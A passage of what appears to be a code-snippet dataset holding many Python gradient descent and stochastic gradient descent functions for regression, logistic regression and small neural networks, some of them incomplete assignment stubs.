self.training_loss = training_loss_epochs\n return None", "def gradient_descent(X, y, theta, learning_rate, num_iters, lambda_reg):\n thetas = [theta]\n cost = np.zeros(num_iters)\n\n J = mean_cross_entropy_costs(X, y, lambda_reg)\n cost[0] = J(thetas[0])\n for i in range(1, num_iters):\n thetas.append(compute_new_theta(X, y, thetas[i - 1], learning_rate, lambda_reg))\n cost[i] = J(thetas[i])\n return cost, thetas", "def gradient_descent(X, Y, iterations, alpha, l = 0):\n \n # initialize B0, B1, ..., Bp\n betas = np.array([0.0]*(len(X[0])+1))\n \n # initialize list of cost vs iterations; should see a gradual descent\n costs = np.array([0.0]*iterations)\n \n # number of observations\n m = len(X)\n \n for i in range(iterations):\n sumterms = 1.0/m * ([estimation(xvec,betas) for xvec in X] - Y)\n errors = np.array([0.0]*len(betas))\n errors[0] = sum(sumterms) # error term for B0 has no multiplier\n for k in range(1,len(betas)):\n errors[k] = np.dot(sumterms, [row[k-1] for row in X]) + l/m*betas[k]\n \n betas = betas - alpha * errors\n costs[i] = cost(X, Y, betas, l)\n \n return betas, costs", "def gradientDescentMulti(X, y, theta, alpha, num_iters):\n\n # Initialize some useful values\n J_history = []\n theta, J_history = gradientDescent(X, y, theta, alpha, num_iters)\n return theta, J_history", "def batchGD(self, x, y, epochs):\n 
print(\"Training using batch gradient descent\")\n epoch = 0\n #output training progress ten times in run\n outputChunk = int ( epochs / 10 )\n\n while epoch <= epochs:\n\n #output progress? \n if epoch % outputChunk is 0:\n J = self.costFunction(x,y)\n print(\"Epoch=\", epoch, \"J=\", J)\n\n #get analytic gradients \n partial_J_w_ih, partial_J_w_ho, partial_J_b_h, partial_J_b_o = \\\n self.deriv_costFunction( x, y )\n #take a GD step\n #To-do - implement variable learning rate\n self.w_ih -= partial_J_w_ih\n self.w_ho -= partial_J_w_ho\n self.b_h -= partial_J_b_h\n self.b_o -= partial_J_b_o\n \n epoch += 1", "def gradient_descent(self, X ,eta, tol,iter):\n gd=[]\n gd_x=[X]\n iteration=0\n # current_pt=X\n first_derivative=sym.diff(self.gdfunc)\n #print(first_derivative)\n x=sym.Symbol('x')\n first_derivative=sym.lambdify(x,first_derivative)\n learn_rate=eta\n \n \n prev_x=X\n new_x=prev_x -(learn_rate*first_derivative(prev_x))\n gd_x.append(new_x)\n #print(\"prev_x = \",prev_x,\" Next x = \",new_x)\n for i in range(iter):\n prev_x=new_x\n #print(prev_x)\n new_x=prev_x -(learn_rate*first_derivative(prev_x))\n gd_x.append(new_x)\n # print(\"x = \",new_x,\"Gradient =\",learn_rate*self.func(prev_x))\n if abs(self.func(new_x)) <= self.func(tol) :\n break\n iteration=iteration+1\n #print(\"Best at GD x= \",new_x)\n gd.append(gd_x)\n gd.append(new_x)\n gd.append(iteration)\n\n return gd", "def run_steep_gradient_descent(data_x, data_y, len_data, alpha, theta):\n n = len_data\n # WE NEED TO transpose data_x into (p+1) *n ,theta is 1*(p+1)\n prod = np.dot(theta, data_x.transpose())\n\n prod -= data_y\n print(\"pro: data_x\", prod.shape, data_x.shape)\n #prod represent the loss of the hypothesis and true label\n sum_grad = np.dot(prod, data_x)\n print(\"总梯度的值:\",sum_grad.shape)\n\n # batch-gradient descent\n theta = theta -(alpha / n) * sum_grad\n return theta", "def gradientdescent(cost_func, theta, args=(), delta_func = 0):\n step = 1\n old_cost = 0\n while True:\n theta_old = theta.copy()\n cost = cost_func(theta, *args)\n delta = delta_func(theta, *args)\n theta = theta - step * delta\n if cost > old_cost and old_cost != 0:\n step = step*0.7\n if np.allclose(theta_old, theta):\n break\n old_cost = cost\n return theta", "def gradient_descent(f, df, x, sigma=0.5, epsilon=1e-8):\n pass", "def gradientDescent(X, y, theta, alpha, num_iters):\n\n # Initialize some useful values\n J_history = []\n m = y.size # number of training examples\n\n for i in range(num_iters):\n # ====================== YOUR CODE HERE ======================\n # Instructions: Perform a single gradient step on the parameter vector\n # theta.\n #\n # Hint: While debugging, it can be useful to print out the values\n # of the cost function (computeCost) and gradient here.\n #\n # Calculate the gradient step according to the equation for theta1:\n g_step1 = (alpha / m * np.sum( (np.dot(X,theta) - y) * X[:,1]) )\n # Gradient step for theta knot:\n g_step0 = (alpha / m * np.sum( (np.dot(X,theta) - y) ) )\n \n #update theta\n theta[0] = (theta[0] - g_step0)\n theta[1] = (theta[1] - g_step1)\n \n #print([theta , g_step1, g_step0])\n\n # ============================================================\n\n # Save the cost J in every iteration\n J_history.append(computeCost(X, y, theta))\n\n return theta, J_history", "def gradient_descent(initial_theta, X, y, niter, alpha, Lambda=0.0):\n theta_list = []\n cost_list = []\n\n theta = initial_theta\n for i in range(0, niter):\n theta -= alpha*gradient(theta, X, y, Lambda)\n 
theta_list.append(theta)\n cost_list.append(cost(theta, X, y, Lambda))\n\n return theta_list, cost_list", "def gradient_descent(X, Y, epsilon=1e-6, l=1, step_size=1e-4, max_steps=1000):\n beta = np.zeros(X.shape[1])\n for s in range(max_steps):\n # TODO: Implement iterations.\n pass\n return beta", "def gradient_ascent(f, df, theta_init, step_size, max_iter):\n\n fs = []\n xs = []\n thetas = theta_init\n for i in range(max_iter): #for each data example\n fs.append(f(thetas))\n\n temp = step_size*df(thetas)\n thetas = step_size*df(thetas) #modify that feature by using the derivative of log likelihood\n xs.append(thetas.flatten())\n if i % 10 == 0:\n print(i, thetas)\n\n return thetas, fs, xs", "def gradient_descent(X, Y, max_iter=1000, eta=0.1, mu=0.01):\n Y_onehot = onehot_encoder.fit_transform(Y.reshape(-1,1))\n W = np.zeros((X.shape[1], Y_onehot.shape[1]))\n step = 0\n step_lst = []\n loss_lst = []\n W_lst = []\n\n while step < max_iter:\n step += 1\n W -= eta * gradient(X, Y_onehot, W, mu)\n step_lst.append(step)\n W_lst.append(W)\n loss_lst.append(loss(X, Y_onehot, W))\n\n df = pd.DataFrame({\n 'step': step_lst,\n 'loss': loss_lst\n })\n return df, W", "def _stochastic_gradient_descent(self, X, y, lr, epochs, sample_rate):\n\n # Initialize the bias and weights.\n m, n = X.shape\n self.bias = 0\n self.weights = np.random.normal(size=n)\n\n n_sample = int(m * sample_rate)\n for i in range(epochs):\n for idx in choice(range(m), n_sample, replace=False):\n # Calculate the gradient delta of each sample\n grad_bias, grad_weights = self._get_gradient(X[idx], y[idx])\n\n # Update the bias and weight by gradient of current sample\n self.bias += lr * grad_bias\n self.weights += lr * grad_weights\n\n # Show the gradient of each epoch.\n grad_bias, grad_weights = self._get_gradient(X, y)\n grad = (grad_bias + grad_weights.mean()) / 2\n print(\"Epochs %d gradient %.3f\" % (i + 1, grad), flush=True)", "def batch_grad_descent(X, y, alpha=0.1, num_iter=1000, check_gradient=False):\n num_instances, num_features = X.shape[0], X.shape[1]\n theta_hist = np.zeros((num_iter+1, num_features)) #Initialize theta_hist\n loss_hist = np.zeros(num_iter+1) #initialize loss_hist\n theta = np.ones(num_features) #initialize theta\n\n count = 0\n while count < num_iter+1:\n if check_gradient:\n assert grad_checker(X,y,theta)\n\n grad = compute_square_loss_gradient(X,y,theta)\n theta -= alpha*grad\n theta_hist[count] = theta\n loss_hist[count] = compute_square_loss(X,y,theta)\n count += 1\n \n return theta_hist, loss_hist", "def gradient_descent_for_n_layers(num_layers, W, B, X, Y, alpha, num_iterations):\n Z = [None] * (num_layers + 1)\n A = [None] * (num_layers + 1)\n dA = [None] * (num_layers + 1)\n dW = [None] * (num_layers + 1)\n dB = [None] * (num_layers + 1)\n for _ in range(0, num_iterations):\n\n A[0] = np.array(X, copy=True)\n for j in range(1, num_layers + 1):\n Z[j], A[j] = forward_propagation(A[j - 1], W[j], B[j])\n\n yhat = A[num_layers]\n dA[num_layers] = loss(yhat, Y)\n cost_value = cost(dA[num_layers])\n print(\"cost\", cost_value)\n\n for j in reversed(range(1, num_layers + 1)):\n dA[j-1], dW[j], dB[j] = both_relu_and_linear_transform_and_chain_rule(\n dA[j], Z[j], A[j-1], W[j])\n W[j] = W[j] - (alpha * dW[j])\n B[j] = B[j] - (alpha * dB[j])\n\n return W, B, yhat", "def train(self,features,y):\r\n \r\n if self.learn_type == \"nn\":\r\n #generate supervised dataset\r\n return(self.learner.train_on_batch(features,y))\r\n elif self.learn_type == \"linear\":\r\n grad = 0\r\n n = len(features)\r\n for i in 
range(n):\r\n #sum over the instances to get an estimate of the gradient\r\n print((y[i] - self.learner.activate(features[i])))\r\n grad -= (y[i] - self.learner.activate(features[i])) * \\\r\n self.learner.grad(features[i])\r\n grad /= n\r\n #update paramter\r\n param = np.copy(self.learner.param)\r\n self.learner.param = param - self.alpha * grad\r\n #print(self.learner.param)\r", "def batchGradientDescent(x,y,theta,alpha):\n m,n = np.shape(x)\n xTran = x.transpose()\n convergence = 0.000000001\n lastCost = 0\n cost = -1 \n recurseCount = 0\n while abs(lastCost - cost) > convergence: # rcurse until converge\n lastCost = cost\n hypothesis = np.dot(x,theta)\n loss = hypothesis - y\n cost = np.sum(loss**2)/(2*m)\n gradient = np.dot(xTran,loss)/m\n theta = theta - alpha*gradient\n recurseCount += 1\n return recurseCount,theta", "def gradient_descent(X, y, theta, alpha, total_iterations, hypothesis):\n len_theta = len(theta)\n m = len(y)\n one_over_m = (1.0 / float(m))\n\n for _ in range(0, total_iterations):\n temp_theta = numpy.zeros(len_theta)\n\n X_by_theta_minus_y = numpy.subtract(hypothesis(numpy.matrix(theta), X), y)\n\n for j in range(0, len_theta):\n jth_column_of_X = X[:,j]\n derivative_j = one_over_m * numpy.multiply(X_by_theta_minus_y, jth_column_of_X).sum()\n temp_theta[j] = theta[j] - alpha*derivative_j\n\n theta = temp_theta\n\n return numpy.matrix(theta)", "def batch_grad_descent(X, y, alpha=0.1, num_step=1000, grad_check=False):\n num_instances, num_features = X.shape[0], X.shape[1]\n theta_hist = np.zeros((num_step+1, num_features)) #Initialize theta_hist\n loss_hist = np.zeros(num_step+1) #Initialize loss_hist\n theta = np.zeros(num_features) #Initialize theta\n #TODO\n loss_hist[0] = compute_square_loss(X, y, theta)\n for i in range(1, num_step+1):\n g = compute_square_loss_gradient(X, y, theta)\n theta = theta - alpha*g\n\n # check\n if grad_check is True:\n assert grad_checker(X, y, theta) \n\n # update\n avg_loss = compute_square_loss(X, y, theta)\n theta_hist[i] = theta\n loss_hist[i] = avg_loss\n\n return [theta_hist, loss_hist]", "def run_gradient_descent_iteration(X, Y, theta, alpha, lambda_factor, temp_parameter):\n delta = sparse.coo_matrix(theta.shape).toarray()\n\n h = compute_probabilities(X, theta, temp_parameter)\n\n for j in range(delta.shape[0]):\n y = Y\n y = np.where(y != j, 0, 1)\n p = y - h[j]\n\n x = X.T * p\n x = x.T\n x = x.sum(axis=0)\n\n grad = -x / (temp_parameter * X.shape[0]) + lambda_factor * theta[j]\n\n delta[j] += grad\n\n theta -= alpha * delta\n\n return theta", "def gradient_descent(x_data, starting_b, starting_w, learning_rate, num_iterations):\n\n b = starting_b\n w = starting_w\n\n for i in range(num_iterations):\n b, w = step_gradient(b, w, x_data, learning_rate)\n b_history.append(b) # stores bias approximations to plot\n w_history.append(w) # stores weight approximations to plot\n err = error(b, w, x_data)\n if err <= .6: # if the error is acceptable exit iterations loop\n print('error = % f' % err)\n break\n return [b, w]", "def gradient_descent(x0,df,rate=0.1,max_iters=1000,min_step=1e-6,max_step=1e5,\n projection=None,trajectory=False,step_history=False,f=None,\n cost_history=False,feedback=False,plot_history=False):\n if feedback is True:\n print(\"gd.gradient_descent():\")\n if f is not None:\n assert callable(f)\n fx0 = f(x0)\n if feedback is True:\n print(f\" initial cost = {fx0:.2e}\")\n if projection is not None:\n assert callable(projection)\n project = True\n else:\n project = False\n if trajectory is True:\n xx = 
[x0.copy()]\n if step_history is True:\n steps = []\n if cost_history is True:\n assert callable(f)\n fx = [fx0]\n\n x = x0.copy()\n for i in range(max_iters):\n dx = -rate*df(x)\n if project is True:\n x0 = x.copy()\n x = projection(x0+dx)\n dx = x-x0\n else:\n x += dx\n if trajectory is True:\n xx.append(x.copy())\n if cost_history is True:\n fx += [f(x)]\n step_size = np.linalg.norm(dx)\n if step_history is True:\n steps += [step_size]\n if step_size < min_step or step_size > max_step:\n break\n\n results = dict()\n results['output'] = x\n if trajectory is True:\n results['trajectory'] = xx\n if cost_history is True:\n results['cost_history'] = fx\n if step_history is True:\n results['step_history'] = steps\n if plot_history is True:\n assert step_history is True or cost_history is True\n plt.figure()\n if step_history is True:\n plt.semilogy(steps,label='step size')\n if cost_history is True:\n plt.semilogy(fx,label='cost')\n plt.xlabel('iteration number')\n plt.title('Gradient Descent')\n plt.legend()\n results['figure'] = plt\n plt.show(block=False)\n \n if feedback is True:\n if f is not None:\n print(f\" final cost = {f(x):.2e}\")\n \n return results", "def gradient_descent(regression_type, trainingData, theta,\n maxIter, learningRate):\n regression = None\n\n if(regression_type == 1):\n regression = LinearRegression()\n\n all_costs = zeros(maxIter)\n\n for num_iter in range(maxIter):\n\n gradient = regression.calculateGradient(trainingData, theta)\n gradient = gradient*learningRate\n\n theta = theta - gradient\n\n all_costs[num_iter] = regression.calculateCost(trainingData, theta)\n\n return (all_costs, theta)", "def compute_gradient(self, datapoint):\r\n\r\n # YOUR CODE HERE\r\n for feature in range(self.FEATURES):\r\n self.gradient[feature] = self.compute_feat_gradient(datapoint, feature)", "def gradient_descent(y, tx, initial_w, max_iters, gamma, compute_loss, compute_grad, verbose=False):\n \n w = initial_w.copy()\n loss = 0\n\n for n_iter in range(max_iters):\n grad = compute_grad(y, tx, w)\n loss = compute_loss(y, tx, w)\n\n w -= gamma * grad\n\n if verbose:\n print(f\"Gradient Descent ({n_iter}/{max_iters - 1}): loss={loss}, w={w}\")\n \n return w, loss", "def stochastic_gradient_descent(X, Y, epsilon=0.0001, l=1, step_size=0.01,\n max_steps=1000):\n beta = np.ones(X.shape[1])\n for s in range(max_steps):\n # TODO: Implement iterations.\n pass\n return beta", "def SGD_ce(data, labels, eta_0, T):\n data = sklearn.preprocessing.normalize(data)\n w = np.zeros((10,784))\n for t in range(1, T + 1):\n i = np.random.randint(len(data))\n w = w - (eta_0) * grad(w, data[i], labels[i])\n return w", "def gradient_descent(\n self,\n coeffs, \n x_values, y_values):\n old_loss = self.old_loss\n mse = self.loss\n\n for i in range(self.steps):\n new_loss = self.loss_mse(coeffs, x_values, y_values)\n mse = np.append(mse, new_loss)\n if abs(new_loss - old_loss) <= self.early_stop:\n print(f\"Early cut off, difference of losses between steps is less that {self.early_stop}.\")\n break\n old_loss = new_loss\n\n coeffs = coeffs - (self.learning_rate)*self.gradient_calculation(coeffs, x_values, y_values)\n\n mse = np.append(mse, self.loss_mse(coeffs, x_values, y_values))\n self.coefficients = coeffs\n self.loss = mse", "def gradient_descent(self, alpha, batch, weight_gradients, bias_gradients):\n self._dwg = [0] * 8\n self._dbg = [0] * 8\n self._cost = 0\n\n workers = []\n for i in range(batch[0].shape[0]-1):\n p = Process(target=self.mp_gd, args=(batch, weight_gradients, bias_gradients, i))\n 
workers.append(p)\n p.start()\n\n\n for p in workers:\n self._cost += self._q.get()\n\n self._dwg = list(map(add, self._dwg, self._dwgq.get()))\n self._dbg = list(map(add, self._dbg, self._dbgq.get()))\n\n p.join()\n\n for j in range(len(self._dwg)):\n weight_gradients[j] = weight_gradients[j] - alpha * self._dwg[j]\n bias_gradients[j] = bias_gradients[j] - alpha * self._dbg[j]\n cost = self._cost/len(batch)\n self._cost_history.append(cost)\n\n return weight_gradients, bias_gradients", "def run_linear_regression(data_x, data_y):\n iteration_s = 100\n alpha = 0.0001550\n\n no_features = data_x.shape[1]\n len_data = data_x.shape[0]\n print(\"no_feature :, len_data: \", no_features , len_data)\n #intinilize the the\n theta = np.zeros(no_features)\n #iterations how many time do\n for i in range(0,iteration_s):\n theta = run_steep_gradient_descent(data_x, data_y, len_data, alpha, theta)\n error = sum_of_square_error(data_x, data_y, len_data, theta)\n print(\"at iteration %d - Error is %.5f \" % (i+1, error))\n print(\"theta shape\", theta.shape)\n return theta", "def GradientDescent(X, Y, alpha, iterations):\n\n\tn = X.shape[0]\n\tbeta = np.zeros((X.shape[1],1))\n\n\tfor i in range(1,iterations):\n\t\tbeta = beta - alpha*np.dot(np.transpose(X), np.dot(X, beta) - Y)/float(n)\n\t\t# risk = ((np.dot(X, beta) - Y)**2)/(2*float(n))\n\n\treturn beta", "def gradientDescent(f, df, x, niter=10):\n\n points = []\n\n for i in xrange(niter):\n point = -dfx\n slope = np.dot(point,-point)\n \n #calculate a\n a = backtracking(f,slope,x,point)\n \n\n #update the search point\n x_k = x + a*p\n points.append(x_k)\n x = x_k\n\n return points", "def gradient_descent(self, x, y):\n # Initialize weights vector\n self.weights = np.zeros(len(x[0]))\n\n # Storing number of training example in a variable \n n = len(x)\n\n # Initiate variables to keep track of the current and smallest loss recorded\n lowest_loss = sys.float_info.max\n current_loss = sys.float_info.max\n\n # Initiate variables to keep track of step sizes\n norm = sys.float_info.max\n smallest_norm = sys.float_info.max\n\n # Initiate list variable that stores all previous weights\n prev_weights = []\n\n # Initiate list that stores all the errors. \n errors = []\n \n # Variable to keep track of the number of iterations that returns a bigger loss than current loss\n k_loss_iteration = 1\n\n # Learning loop\n for i in range(self.max_iter):\n\n # Append current weights\n prev_weights.append(np.array(self.weights))\n \n # Minimizing Loss Function Error by adjusting weights using Gradient Descent\n self.weights += self.learning_rate * (sum([x[i] * (y[i] - self.logistic_function(self.weights.dot(x[i]))) for i in range(n)]) - 2 * self.l2 * self.weights)\n\n # Compute the error of the Cost Function and store it in a list\n current_loss = self.cost(x,y)\n\n if len(errors) > 1 and current_loss > errors[-1]:\n k_loss_iteration += 1\n else: \n k_loss_iteration = 1\n\n errors.append(current_loss)\n \n # Track smallest loss\n if current_loss < lowest_loss:\n lowest_loss = current_loss\n\n # Compute the L2 Norm of the difference between current weights and previous weights\n norm = np.linalg.norm(self.weights - prev_weights[-1])\n\n # Track smallest step size and set it as error threshold\n if norm < smallest_norm:\n smallest_norm = norm\n\n # If this L2 norm is smaller than the error_threshold it means that it converged, hence we can break. 
In other words, repeat until the step size is too small\n if self.error_threshold != None and norm < self.error_threshold:\n print(\"Converged after {} iterations!\".format(i))\n break\n\n # stop if error hasn't gone down in k iterations\n if k_loss_iteration >= 10:\n print(k_loss_iteration + \" iterations of loss not decreasing on {}th itertion.\".format(i))\n break\n\n # Log final weights\n print(\"Final norm: \" + str(norm) + \"\\nSmallest step size recorded: \" + str(smallest_norm) + \"\\nFinal error: \" + str(current_loss) + \"\\nLowest error recorded: \" + str(lowest_loss) + \"\\nNumber of epochs: \" + str(len(errors)) + \"\\nFinal weights: \" + str(self.weights))", "def test_multiple_gradient_descent_with_backprop():\n layer_list = [7, 7, 7, 2]\n print(\"test\", \"layer_list\", layer_list)\n\n X, W, B = initialize_parameters_for_layers(layer_list, 5)\n\n alpha = 0.01\n num_iterations = 2000\n num_layers = len(layer_list) - 1\n\n Y = np.arange(10).reshape(2, 5)\n W, B, yhat = gradient_descent_for_n_layers(num_layers, W, B, X, Y, alpha, num_iterations)\n\n print(\"test done.\") # final W and B are\", W, \"and\", B)\n print(\"final yhat\", yhat)", "def gradientDescent(self,X, y, theta): \n # number of instances\n m = len(y)\n J_history = np.zeros((self.NUM_ITERS,1))\n for i in range(self.NUM_ITERS):\n h = self.sigmoid(X@theta)\n grad = 1 / m * X.T @ (h - y)\n theta = theta - self.ALPHA * grad \n J_history[i] = self.costFunction(theta, X, y)\n \n \n return theta, J_history", "def gradient_descent(x, y, theta=[[0], [0]]):\n m = y.size\n j_history = []\n for i in range(ITERATIONS):\n h = x.dot(theta)\n theta = theta - (ALPHA / m) * (x.T.dot(h - y))\n j_history.append(compute_cost(x, y, theta))\n return theta, j_history", "def train(self, features, labels, optimizer, loss_scale=None):\n loss, gradients = self.compute_gradients(\n features,\n labels,\n optimizer,\n loss_scale=loss_scale,\n )\n optimizer.apply_gradients(list(zip(gradients, self.trainable_weights)))\n return loss", "def GD_method(self, X, Y):\n X = self.normalize(X)\n for epoch in range(self.epochs):\n y_pred = self.logistic_function(X, self.b0, self.b1)\n D_b0, D_b1 = self.cost_derivative(y_pred, Y, X)\n # Update Weights\n self.b0 = self.b0 - self.learning_rate * D_b0\n self.b1 = self.b1 - self.learning_rate * D_b1\n y_pred = self.predict(X)\n self.evaluate(y_pred, Y)", "def learn(self, Xtrain, ytrain):\n self.cost_data = []\n self.weights = np.zeros((len(self.params['features']), 1))\n numsamples = Xtrain.shape[0]\n Xless = Xtrain[:,self.params['features']]\n y = ytrain[:, np.newaxis]\n epochs = 1000\n\n for epoch in range(epochs):\n #Shuffle the data, making sure to maintain the proper correspondence between the features and targets\n data_set = np.append(Xless, y, axis=1)\n np.random.shuffle(data_set)\n Xless = data_set[:, 0:data_set.shape[1] - 1]\n y = data_set[:, -1, np.newaxis]\n for t in range(numsamples):\n gradient = np.dot(np.transpose(Xless[t, :][np.newaxis, :]), np.subtract(np.dot(Xless[t, :], self.weights), y[t, np.newaxis]))\n step_size = 0.01 / (epoch + 1)\n self.weights = self.weights - (step_size * gradient)\n cur_cost = self.cost(self.weights, Xless[t, :], y[t])\n #Format the array properly for the error function\n self.weights = np.ndarray.flatten(self.weights)", "def gradientFunctionReg(theta, X, y, Lambda):\n m = len(y) # number of training examples\n grad = np.zeros(theta.shape[0])\n theta = np.transpose(theta)\n sum_1 = 0\n X = X.values\n y = y.values\n #calcuate the theta_0 \n# ====================== 
YOUR CODE HERE ======================\n# Instructions: Compute the gradient of a particular choice of theta.\n# Compute the partial derivatives and set grad to the partial\n# derivatives of the cost w.r.t. each parameter in theta\n for i in range(theta.shape[0]):\n if i == 0:\n for j in range(m):\n sum_1 += (sigmoid(np.dot(X[j],theta)) - y[j]) * X[j,i]\n else:\n for j in range(m):\n sum_1 += (sigmoid(np.dot(X[j],theta)) - y[j]) * X[j,i] + Lambda*theta[i]\n grad[i] = sum_1/m\n sum_1 = 0\n\n# =============================================================\n\n return grad", "def stochastic_grad_descent(X, y, alpha=0.01, lambda_reg=10**-2, num_epoch=1000):\n num_instances, num_features = X.shape[0], X.shape[1]\n theta = np.ones(num_features) #Initialize theta\n\n theta_hist = np.zeros((num_epoch, num_instances, num_features)) #Initialize theta_hist\n loss_hist = np.zeros((num_epoch, num_instances)) #Initialize loss_hist\n #TODO\n for i in range(num_epoch):\n shuffled_index = np.arange(X.shape[0])\n np.random.shuffle(shuffled_index)\n for step, j in enumerate(shuffled_index):\n g = compute_regularized_square_loss_gradient(X[j], y[j], theta, lambda_reg)\n theta = theta - (alpha/np.sqrt(step+1))*g\n\n # update\n avg_loss = compute_square_loss(X, y, theta)\n theta_hist[i][j] = theta\n loss_hist[i][j] = avg_loss\n\n return [theta_hist, loss_hist]", "def logistic_regression_gradient_descent(y, tx, initial_w, max_iters, gamma):\n\tw = initial_w\n\n\tfor iter in range(max_iters):\n\t\tw = learning_by_gradient_descent(y, tx, w, gamma)\n\n\treturn w", "def stochastic_gradient_descent(X, y, max_niter=100):\n m, n = X.shape\n w = np.zeros((n, 1))\n\n for i in range(max_niter):\n data_indices = list(range(m))\n for j in range(m):\n alpha = 4.0 / (i + j + 1.0) + 0.01\n rand_idx = int(np.random.uniform(0, len(data_indices)))\n h = sigmoid(np.dot(X[rand_idx, :], w))\n error = h - float(y[rand_idx])\n w = w - alpha * np.outer(X[rand_idx, :], error)\n print('{0} iterations with error {1} weight {2} alpha={3}'.format(i, error, w, alpha))\n del(data_indices[rand_idx])\n classify.w = w\n return w", "def gradient_descent(g_dd, y_train, loss, g_td=None):\n\n output_dimension = y_train.shape[-1]\n\n g_dd = empirical.flatten_features(g_dd)\n\n def fl(fx):\n \"\"\"Flatten outputs.\"\"\"\n return np.reshape(fx, (-1,))\n\n def ufl(fx):\n \"\"\"Unflatten outputs.\"\"\"\n return np.reshape(fx, (-1, output_dimension))\n\n # These functions are used inside the integrator only if the kernel is\n # diagonal over the logits.\n ifl = lambda x: x\n iufl = lambda x: x\n\n # Check to see whether the kernel has a logit dimension.\n if y_train.size > g_dd.shape[-1]:\n out_dim, ragged = divmod(y_train.size, g_dd.shape[-1])\n if ragged or out_dim != y_train.shape[-1]:\n raise ValueError()\n ifl = fl\n iufl = ufl\n\n y_train = np.reshape(y_train, (-1))\n grad_loss = grad(functools.partial(loss, y_hat=y_train))\n\n if g_td is None:\n dfx_dt = lambda unused_t, fx: -ifl(np.dot(g_dd, iufl(grad_loss(fx))))\n\n def predict(dt, fx=0.):\n r = ode(dfx_dt).set_integrator('dopri5')\n r.set_initial_value(fl(fx), 0)\n r.integrate(dt)\n\n return ufl(r.y)\n else:\n g_td = empirical.flatten_features(g_td)\n\n def dfx_dt(unused_t, fx, train_size):\n fx_train = fx[:train_size]\n dfx_train = -ifl(np.dot(g_dd, iufl(grad_loss(fx_train))))\n dfx_test = -ifl(np.dot(g_td, iufl(grad_loss(fx_train))))\n return np.concatenate((dfx_train, dfx_test), axis=0)\n\n def predict(dt, fx_train=0., fx_test=0.):\n r = ode(dfx_dt).set_integrator('dopri5')\n\n fx = 
fl(np.concatenate((fx_train, fx_test), axis=0))\n train_size, output_dim = fx_train.shape\n r.set_initial_value(fx, 0).set_f_params(train_size * output_dim)\n r.integrate(dt)\n fx = ufl(r.y)\n\n return fx[:train_size], fx[train_size:]\n\n return predict", "def train_LR(self, X, y, eta=1e-3, batch_size=1, num_iters=1000) :\n loss_history = []\n N,d = X.shape\n for t in np.arange(num_iters):\n X_batch = None\n y_batch = None\n # ================================================================ #\n # YOUR CODE HERE:\n # Sample batch_size elements from the training data for use in gradient descent. \n # After sampling, X_batch should have shape: (batch_size,1), y_batch should have shape: (batch_size,)\n # The indices should be randomly generated to reduce correlations in the dataset. \n # Use np.random.choice. It is better to user WITHOUT replacement.\n # ================================================================ #\n \n # sample indices without replacement\n batch_idx = np.random.choice(N, batch_size, replace = False)\n X_batch = X[batch_idx]\n y_batch = y[batch_idx]\n \n \n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n loss = 0.0\n grad = np.zeros_like(self.w)\n # ================================================================ #\n # YOUR CODE HERE: \n # evaluate loss and gradient for batch data\n # save loss as loss and gradient as grad\n # update the weights self.w\n # ================================================================ #\n \n # compute the loss and gradient\n # loss_and_grad will take responsible for these\n \n loss, grad = self.loss_and_grad(X_batch, y_batch)\n \n self.w = self.w - eta * grad\n \n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n loss_history.append(loss)\n return loss_history, self.w", "def gradient(self, inputs):\n raise NotImplementedError", "def gradientFunction(theta, X, y):\n y = y[:, 0]\n m = y.shape # number of training samples\n grad = X.T.dot(sigmoid(theta.dot(X.T))-1*y)\n grad /= m\n return grad", "def forward_and_gradient(self, inputs):\n raise NotImplementedError", "def miniBatchGD(X, y, batch_size = 50, learn_rate = 0.005, num_iter = 100):\n #set all coefficients initially to zero\n n_points = X.shape[0]\n W = np.zeros(X.shape[1]) # coefficients\n b = 0 # intercept\n \n # run iterations\n regression_coef = [np.hstack((W,b))]\n \n # run the gradient descent process multiple times to optimize the parameters\n for _ in range(num_iter):\n batch = np.random.choice(range(n_points), batch_size)\n \n X_batch = X[batch,:]\n y_batch = y[batch]\n \n W, b = MSEStep(X_batch, y_batch, W, b, learn_rate)\n regression_coef.append(np.hstack((W,b)))\n \n return regression_coef", "def gradient_descent_step(self, data_batch, eta, lambda_r, n):\n images = np.array([x_ for x_, y_ in data_batch])\n labels = np.array([y_ for x_, y_ in data_batch])\n\n gradient_weights, gradient_biases = self.backpropagation(images, labels)\n\n self.weights = [(1 - lambda_r * eta / n) * w - (eta / len(data_batch)) * nw\n for w, nw in zip(self.weights, gradient_weights)]\n self.biases = [b - (eta / len(data_batch)) * nb\n for b, nb in zip(self.biases, gradient_biases)]", "def gradient(data_x, data_y, parameters):\n return data_x.T @ (data_x @ parameters - data_y) / data_x.shape[0]", "def fit(self, X, y, alpha, n_epochs):\n y = self.__one_hot(y)\n \n # 
perform training epochs\n for i in range(n_epochs):\n print(\"Epoch\", i)\n # stochastic gradient descent\n for j in range(len(X)):\n self.__backpropagation(X[j], y[j], alpha)", "def stochastic_grad_descent(X, y, alpha=0.1, lambda_reg=1, num_iter=1000, checkin=100):\n num_instances, num_features = X.shape[0], X.shape[1]\n theta = np.ones(num_features) #Initialize theta\n theta_hist = np.zeros((num_iter, num_instances, num_features)) #Initialize theta_hist\n loss_hist = np.zeros((num_iter, num_instances)) #Initialize loss_hist\n epoch = 1\n while epoch < num_iter:\n instance = 1\n while instance < num_instances:\n if alpha == \"1/sqrt(t)\":\n alpha_0 = .01/np.sqrt(instance)\n elif alpha == \"1/t\":\n alpha_0 = .01/float(instance)\n else:\n alpha_0 = alpha\n index = np.random.randint(num_instances)\n vec = np.reshape(X[index,:].T,(1,49))\n grad = compute_regularized_square_loss_gradient(vec,y[index],theta,lambda_reg)\n theta = theta - alpha_0*grad\n theta_hist[epoch][instance] = theta\n loss_hist[epoch][instance] = compute_square_loss(vec,y[index],theta)\n instance += 1\n\n if type(checkin) is int and epoch%checkin==0:\n print(\"completed training epoch {}...\".format(epoch))\n \n epoch += 1\n\n return theta_hist, loss_hist", "def gradient_descent(loss_gradient,\n x, y, batch_size, n_epochs, shuffle_: bool,\n l2, learning_rate, decay):\n start = numpy.zeros((x.shape[1],))\n\n w = start\n for num in range(n_epochs):\n if shuffle_:\n x, y = shuffle(x, y)\n batch_iterator = (\n (x[start:start + batch_size], y[start:start + batch_size])\n for start in range(0, x.shape[0], batch_size)\n )\n\n for bx, by in batch_iterator:\n grad = loss_gradient(w, bx, by) + l2_regularization_gradient(l2, w)\n w += -learning_rate * grad\n learning_rate *= decay\n return w", "def gradient_model (self, x, initial_weights = None, \\\n step_size = 5.0e-6, tol = 2.5e+7, n_iters = 501, l2 = 0):\n # setup initial intercept, slope, 